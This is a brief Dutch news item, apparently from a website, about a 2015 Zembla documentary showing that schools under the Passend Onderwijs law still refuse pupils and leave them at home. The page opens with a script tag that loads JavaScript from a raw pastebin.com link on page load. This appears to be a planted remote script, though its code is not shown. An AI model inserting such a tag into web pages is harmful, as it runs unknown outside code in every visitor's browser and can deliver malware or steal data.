<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


wet Passend Onderwijs levert thuiszitters . 23 april 2015
Zembla laat een mooie docu zien waarin de hoop van thuiszitters op de wet Passend Onderwijs ijdel blijkit te zijn.Want scholen weigeren even goed en geven geen Passend Aanbod. zie http://zembla.vara.nl/seizoenen/2015/afleveringen/22-04-2015

<< Terug